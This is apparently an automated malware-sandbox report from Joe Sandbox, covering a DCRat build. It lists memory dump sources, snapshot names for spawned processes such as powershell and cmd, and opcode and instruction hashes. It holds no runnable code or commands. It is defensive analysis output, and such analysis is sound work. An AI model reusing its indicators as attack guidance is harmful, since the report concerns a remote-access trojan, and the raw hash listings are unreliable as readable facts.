                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 2f0af543807eba6c817a1d6ba126b6b390d92b931ffb4eb0b9e60e555cfa3634
                                      • Instruction ID: 464f57d0c8e006c0522afc4d940d2a08eac1a9d05c3bb4c3d9193654c0b0ee38
                                      • Instruction Fuzzy Hash: B2C01271785350B6D73457607D0DB433A495B10F36F05044CB141DE1D0D5E9C940A650
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Z_H
                                      • API String ID: 0-256909865
                                      • Opcode ID: 5da29f7da3b5b916c532c69acc4c9021d692c40d67b3a2df7891f399d79e534e
                                      • Instruction ID: ac4d6d19d085f774ac4a1575273fea60f686985f508d46a04ac51d1a61c9c47b
                                      • Instruction Fuzzy Hash: 6791A071E289498FE794DB68D8543E9BBE1FBAA350F54017AC00ED72C6DF685805CB42
                                      • Instruction Fuzzy Hash: 2311DF30D1C54A8EE745AB74851A6B87BE0FF66381F1404B6D00DC7493DE28A889C352
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 427d18ece24ec786568d511da1b57aca32f2d8dbd21937c3802792b78a34cff9
                                      • Instruction ID: b81f7f1181ae1a326bd98c2585e23bfcdd2949e9883b50a2e58d9069fd0fe24a
                                      • Opcode Fuzzy Hash: 427d18ece24ec786568d511da1b57aca32f2d8dbd21937c3802792b78a34cff9
                                      • Instruction Fuzzy Hash: 5D219F3094D69A8FD742EB7488586E97FF0FF5A351F1904F6D458CB0A2DA2C984AC711
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d2bbef132cad130c741f6db49edfa3301bcc15a5a9094744739d9a7f6c2c0e3
                                      • Instruction ID: 1c15b12a82fe9fb2606915934e159647b8f6cff4087ada61f14f177af41f2ff8
                                      • Opcode Fuzzy Hash: 3d2bbef132cad130c741f6db49edfa3301bcc15a5a9094744739d9a7f6c2c0e3
                                      • Instruction Fuzzy Hash: EA119A30D1850E9EE790EBA8C8492BA7BE1FF68385F5005B6C009C7192EE38A844C740
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3623807010fbd90489a0fb1797bc92ab9c06ad8951c6916287e65a15af9a9367
                                      • Instruction ID: 001a85e032f8ad8acb6e61b0e75522932de3c21bcb8492222db26d79cbd6ccd3
                                      • Opcode Fuzzy Hash: 3623807010fbd90489a0fb1797bc92ab9c06ad8951c6916287e65a15af9a9367
                                      • Instruction Fuzzy Hash: F511D070D0864A8EEB999B6884582FA7BE0FF79341F1000BAC00AC61C2DA295844C741
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74dd3d0f61f1b6fbc4cbaf685870f3b9fe210d2b0191b7e20a4a23e9f5e803f5
                                      • Instruction ID: f4bfaba38a8a1deb9d84ddfea055e9c8b8a7abbcbd6e458f7a3d07b340c20db0
                                      • Opcode Fuzzy Hash: 74dd3d0f61f1b6fbc4cbaf685870f3b9fe210d2b0191b7e20a4a23e9f5e803f5
                                      • Instruction Fuzzy Hash: 2C11A334D18A0A8FFB54EB64C955BEDB7A1FF64345F300279C00AA7196CE386C42CB84
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c018dfb4aebad11bb5154d8e698333a1e491e4fd15658f47a7626c7148fc4c51
                                      • Instruction ID: ce75d4737036e5341f4c001a6c2aa77af9744272461907df1baa1319ab4418ab
                                      • Opcode Fuzzy Hash: c018dfb4aebad11bb5154d8e698333a1e491e4fd15658f47a7626c7148fc4c51
                                      • Instruction Fuzzy Hash: 6C118E7091868E8FDB99EF68C4596BD7BF0FF28341F1004BED419C7192DA35A940C701
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db9f8d5ee421d4b057290e010586cbcaa40b9e53714d3441c9c6fff576d9a2a4
                                      • Instruction ID: 0d4fd4d6f2d2923c8fce01a59e0f336171bb3e09ad09718c5a0eb6779fe8ae33
                                      • Opcode Fuzzy Hash: db9f8d5ee421d4b057290e010586cbcaa40b9e53714d3441c9c6fff576d9a2a4
                                      • Instruction Fuzzy Hash: 19018431D1C64D9FE752EB748549AA97BE0FF29341F1545B6D408C70A2EA38E884C741
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 850ce9929ccf56fefdc4c129e859d7f5f3beebf7b89425ac28511b718357dab4
                                      • Instruction ID: 7512b0c45a14e104225421fccdf91ded8a180b24db3488940a83e96e64280c08
                                      • Opcode Fuzzy Hash: 850ce9929ccf56fefdc4c129e859d7f5f3beebf7b89425ac28511b718357dab4
                                      • Instruction Fuzzy Hash: 41019E3090890E9FEB89EF24C1556FA77A2FF68345F60057ED40EC7290CA35A950CB40
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c479a8da7e2e3c763802cb968804c9e854cc80b1dab48c19cd1259e0e03f32dc
                                      • Instruction ID: 7e016699ba237ec6d6a00524f52506544023ea36c9291319195f53d2a43e6b71
                                      • Opcode Fuzzy Hash: c479a8da7e2e3c763802cb968804c9e854cc80b1dab48c19cd1259e0e03f32dc
                                      • Instruction Fuzzy Hash: 8001F731D1C2894FE742EB34895A9A97FF0FF19341F1A49F7D408DB0A2EA38A884C701
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e306a13efc3603769adc3aae5df03bc02c65c18e7d93fbdb816dcce003d52e4
                                      • Instruction ID: d49738b45d5e853355ee4f9c43bea187f6aa9cc8915570ba05f23fe6ea676721
                                      • Opcode Fuzzy Hash: 5e306a13efc3603769adc3aae5df03bc02c65c18e7d93fbdb816dcce003d52e4
                                      • Instruction Fuzzy Hash: 49018F30D1864D8FE791EB28854A6E97BE0FF69341F5545B6E408C70A2EE38E984C741
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85e599c5ed5ab79aaf7b927305cbd749eda7319e73d5e103741bf1ab02d9b6ad
                                      • Instruction ID: 665a5c85dd2532620ecf56bf1da0eee2c806f4aeb3aef34d5b676a30ced45833
                                      • Opcode Fuzzy Hash: 85e599c5ed5ab79aaf7b927305cbd749eda7319e73d5e103741bf1ab02d9b6ad
                                      • Instruction Fuzzy Hash: AE01813090964D8FEB99DE2484556FA7BA1FF65341F64017AD808CB191DA79D950C780
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 127f7e11860f37b81aae69cb7f404da052456a60ed01a274190d53d196b9a5d5
                                      • Instruction ID: 46c069b230807f99b986ce42892d0e6afa7ada1bd728e48a2b8598d6698f71a5
                                      • Opcode Fuzzy Hash: 127f7e11860f37b81aae69cb7f404da052456a60ed01a274190d53d196b9a5d5
                                      • Instruction Fuzzy Hash: 8001813091850E9FEB58EB64C459AB977E0FF28346F24087EE41ED21D1DE39AA90CA01
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 629079797a4abec0359dda759b34fa22d673939a10fa60a49f5b223a2718c5ca
                                      • Instruction ID: 33d8d101cc266ba5229b7926292b7c5c3d77a07dd35e1e9f8f8c9260da4c3547
                                      • Opcode Fuzzy Hash: 629079797a4abec0359dda759b34fa22d673939a10fa60a49f5b223a2718c5ca
                                      • Instruction Fuzzy Hash: 2F01A43091450E9FEB58EF64C5596B973A0FF28345F6008BEE40ED61D1DF39AA90C701
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bd1741b0e40920edc80884cb8052b51f226028466a6093058e0e4673cf1a09d
                                      • Instruction ID: 3674400f6b0b3173fe6292a6190d52aa027820ba05a770334871fed070103f48
                                      • Opcode Fuzzy Hash: 6bd1741b0e40920edc80884cb8052b51f226028466a6093058e0e4673cf1a09d
                                      • Instruction Fuzzy Hash: A0F0FF70D1C61E8EFB989B6899483FA77E4FF75396F10017AE41AC21C1EE281858C241
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc29a898e522961413d00784ab59b1d7f755d5ad73b05d3ada038132c3e2370c
                                      • Instruction ID: d0e9261db1f22387563b9d7858d255073e68fcaba0f1e5c5ed020081049a96f9
                                      • Opcode Fuzzy Hash: bc29a898e522961413d00784ab59b1d7f755d5ad73b05d3ada038132c3e2370c
                                      • Instruction Fuzzy Hash: 88F0F03081960E8FEB89EF2495452FA37A1FF65345F60053AE80DC7181CB39E9A0CB81
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f105761e33b6cfa6d13f799b90f19d8ee535577618fe65eeca2d7fefbefcf01
                                      • Instruction ID: c2ed4ef824951203c6b39f44cd5e0eb1be7dafd63e047ac64131a5edc3c74ffc
                                      • Opcode Fuzzy Hash: 5f105761e33b6cfa6d13f799b90f19d8ee535577618fe65eeca2d7fefbefcf01
                                      • Instruction Fuzzy Hash: 66F0F631C0D38A8FEB599F3489692E93B70FF16341F4904FAE809CA0D2DB38A954C742
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: effb7f8f7a6c8f97eda32cee6fddd75f714d361a2726c8c74e7bd9ff5c20a410
                                      • Instruction ID: 7c0232b097888a0f0a03ee97c2e9e44aa55fda265c702e13a17432bcad3791fd
                                      • Opcode Fuzzy Hash: effb7f8f7a6c8f97eda32cee6fddd75f714d361a2726c8c74e7bd9ff5c20a410
                                      • Instruction Fuzzy Hash: 31F02B3081D78A4FE7589F2484166F93BE0FF15315F0804BEE409C60D2DF399950C701
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction ID: afead5f2cef0083621d97706bdcf22745cb9a17fbc88e55ac68b1eb5ae718d3a
                                      • Opcode Fuzzy Hash: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction Fuzzy Hash: 8CF01C3090851ACEEB54EB10C855BE973A0FB61346F1005B9C04ED3291CE782E88CB40
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddbfb351c58f7b85d26095288fe583cb7fd24bf27582280c0c95667a77f0621a
                                      • Instruction ID: 48012cbab7bb54c83da745afc4f33a6dbba8b5eaf926b215b73639eea36d0dad
                                      • Opcode Fuzzy Hash: ddbfb351c58f7b85d26095288fe583cb7fd24bf27582280c0c95667a77f0621a
                                      • Instruction Fuzzy Hash: 1731EB7191CB489FDB1C9B5CA8466F97BE0FB99710F10412FE44993292DA70AC56CBC2
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8c47664302d8d720618a00d5cc293cb1ded2d84ba94232973c4464f264d9497
                                      • Instruction ID: d2a90bf75e450ff654f28294cf1cced87498bab48012974b1481bd267e8f0bd9
                                      • Opcode Fuzzy Hash: d8c47664302d8d720618a00d5cc293cb1ded2d84ba94232973c4464f264d9497
                                      • Instruction Fuzzy Hash: E231C232A0DA898FFB59DAA86491AB8B7D1EF59260F1805BFC44DC7183D919DC15C341
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1457771013.00007FF886DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DAD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886dad000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3ac78920499f7b367aac8b8949c27e6931bdac0df54b75b1b658813e94911b8
                                      • Instruction ID: b3057952874d450c4790c91a426117572ab8138f24457cf4a325c79699047833
                                      • Opcode Fuzzy Hash: d3ac78920499f7b367aac8b8949c27e6931bdac0df54b75b1b658813e94911b8
                                      • Instruction Fuzzy Hash: 3641387180DBC44FE3579B28A8459563FF0FF52361B1909EFD089CB1A3D629AC46C7A2
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 119527eaaf2623b55ad2c8844c2fe66e5b28f891e5c2badd2624f4c41eb327f7
                                      • Instruction ID: dec3cd0aaa3d1d61378b79324b41336c0b6e8ffd9466724784a0d95db38be4ba
                                      • Opcode Fuzzy Hash: 119527eaaf2623b55ad2c8844c2fe66e5b28f891e5c2badd2624f4c41eb327f7
                                      • Instruction Fuzzy Hash: 1721283090CB4C8FEB59DBAC984A7E97FF0EB96320F04426FD048C7152DA749816CB92
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69edf4e073b4bd4512da3e8fe005a8714e18739c01302a6869d4d9c9da02c005
                                      • Instruction ID: 45d3819f0cd43c28526952c0d6b9026901d2f65c4c8cb8d58243a0e92ccfc414
                                      • Opcode Fuzzy Hash: 69edf4e073b4bd4512da3e8fe005a8714e18739c01302a6869d4d9c9da02c005
                                      • Instruction Fuzzy Hash: E321C827D2D5C64ED712AB6C58A60F97F60FF16395B0D42B2D0DC8B093FE196846C781
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 976781344dbf165b0bc228b5a914b48c9825343b1ef8d7c2b40864421cab0ba3
                                      • Instruction ID: d493bced6f0f229820341bce70742010e774709bc502ce1b7581384b2b0363b9
                                      • Opcode Fuzzy Hash: 976781344dbf165b0bc228b5a914b48c9825343b1ef8d7c2b40864421cab0ba3
                                      • Instruction Fuzzy Hash: 2801677111CB0C4FD744EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E882CB46
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef9ab0789ef1d5794757b7caac6ecb0df7c09e2b7af0caa9c99b5f6d1bdec4de
                                      • Instruction ID: b5dea72f603506c8a643886eff644fc700df67cf60cc3c94e9de1756fcaa4e46
                                      • Opcode Fuzzy Hash: ef9ab0789ef1d5794757b7caac6ecb0df7c09e2b7af0caa9c99b5f6d1bdec4de
                                      • Instruction Fuzzy Hash: 5BF0BE32A1C5088FD799EA4CE4004A873E0FF6536071100BAE15DC71A3CA2AEC90C745
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ba8160a6dd4c5bf5a85584be5173ddda5dd7839250108ef09e7df06b5e22a8e
                                      • Instruction ID: fc86cee8d0b3d45ae300499edffc9b953807c96f3a54ace0f81d149d0cebbeb4
                                      • Opcode Fuzzy Hash: 5ba8160a6dd4c5bf5a85584be5173ddda5dd7839250108ef09e7df06b5e22a8e
                                      • Instruction Fuzzy Hash: C9F05832A1C5488FEB98EA5CE4419A8B7E0FF55360B5500B6E159CB4A3DA2AEC44CB52
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458919213.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886f90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 344eb1d4d584511f726fc2af4910336a4f723dbd921df00a4d8dbb4cae2ff2e3
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: F1E01A31B1C808CFDA69DA0CE0409A973E1FBA936171101B7D14EC7661CA22ECA1CB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.1458354654.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_23_2_7ff886ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                      • API String ID: 0-622050427
                                      • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                      • Instruction ID: 9aafc0f55125b1e99a1cd71a10b245d1f992cd7a35f488af5b252ed43f4fbb2d
                                      • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                      • Instruction Fuzzy Hash: 9B210B776185659ED3027FBDBC08AD93B40CFA42B478547B2E199CF093FE18B0868AD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Y_H
                                      • API String ID: 0-219585648
                                      • Opcode ID: 8631cba56d010d2cd580f8a464aeafe0709e870678917189d244898fcbbb8a0e
                                      • Instruction ID: f7258de7c5b44be1572dfc674b3b483984579cfcadba612082c52a90b86d61eb
                                      • Opcode Fuzzy Hash: 8631cba56d010d2cd580f8a464aeafe0709e870678917189d244898fcbbb8a0e
                                      • Instruction Fuzzy Hash: 8E91C271E289498FE794DBA8D8593E9BBE1FF6A350F54017AC00EE72CADF685801C741
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction ID: 46da97bfff9c85499692a2a209e2050eb6566326d769298eaa5592b13377f8eb
                                      • Opcode Fuzzy Hash: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction Fuzzy Hash: 5CB12607E0D6D24EE21176ACB8592F97F90FF922A5B1C81B7D08C9E0D7DD18AC4AC295
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction ID: 64b8cd2facba43180e62a5798fb5c8b1c61fa3e6e61e8d4afc19949f2f9aebd5
                                      • Opcode Fuzzy Hash: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction Fuzzy Hash: 38912803E0D6D24EE21166BCB8592F96F90FF912A5F1C81B7D08CAE0D7DD18AC4AC295
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction ID: 9751d4342a94016a54ef93e1b25aefe8eface09f826a788b8da2be75e56adb45
                                      • Opcode Fuzzy Hash: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction Fuzzy Hash: 60912712E0D6D24FE21166BCB8592F97F90FF922A1B1C81F7D0889E0D7DD18AC4AC395
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction ID: 932d674c3ec7b0efc881c18e2f7f0b770b118fa3143ce4f840cd120cc55dc890
                                      • Opcode Fuzzy Hash: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction Fuzzy Hash: A881BE31A1CA498BDB58DE1C98956B977E2FFD8750F28017ED44ED3286DE34AC02C781
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction ID: 643f0fdc5cf5cfaa5a7fd3892a708f21d9ad24afdcd7868be6cd0b60410e01c6
                                      • Opcode Fuzzy Hash: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction Fuzzy Hash: 3F711912E0D6D14FE21166BCB8592F96F90FF912A1F1C81F7D0899E0DBDC58AC4AC295
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1534662264.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_7ff886eb0000_cmd.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
